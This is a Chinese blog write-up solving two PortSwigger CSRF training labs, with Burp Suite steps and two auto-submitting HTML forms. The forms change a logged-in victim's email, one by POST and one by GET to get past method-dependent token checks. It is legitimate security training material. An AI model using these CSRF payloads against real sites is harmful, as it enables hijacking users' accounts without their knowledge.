portswigger CSRF靶场-Lab1,2

admin 2024年2月20日09:10:10评论12 views字数 916阅读3分3秒阅读模式

Lab 1)CSRF vulnerability with no defenses(无限制csrf

(Lab 2)CSRF where token validation depends on request method(切换请求方式无限制csrf


portswigger CSRF靶场-Lab1,2靶场地址:https://portswigger.net/web-security

实验1:CSRF vulnerability with no defenses

1.登录后修改邮箱抓包,生成csrf

portswigger CSRF靶场-Lab1,2

portswigger CSRF靶场-Lab1,2

2.使用burpsuite生成的html包进行存储和向受害者发送(每次发送需要变更邮箱)

portswigger CSRF靶场-Lab1,2

3.再使用靶场提供的包进行存储和向受害者发送,通过此关

<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">    <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script>        document.forms[0].submit(); </script>

portswigger CSRF靶场-Lab1,2


实验2:CSRF where token validation depends on request method

1.登录后修改邮箱抓包,变更请求方法并生成csrf包

portswigger CSRF靶场-Lab1,2

portswigger CSRF靶场-Lab1,2

portswigger CSRF靶场-Lab1,2

2.使用burpsuite生成的html包进行存储和向受害者发送

portswigger CSRF靶场-Lab1,2

3.再使用靶场提供的包进行存储和向受害者发送,通过此关(每次发送需要变更邮箱)

<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">    <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script>        document.forms[0].submit(); </script>

portswigger CSRF靶场-Lab1,2



原文始发于微信公众号(鲲哥的Bypass之旅):portswigger CSRF靶场-Lab1,2

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月20日09:10:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   portswigger CSRF靶场-Lab1,2http://cn-sec.com/archives/2505869.html

发表评论

匿名网友 填写信息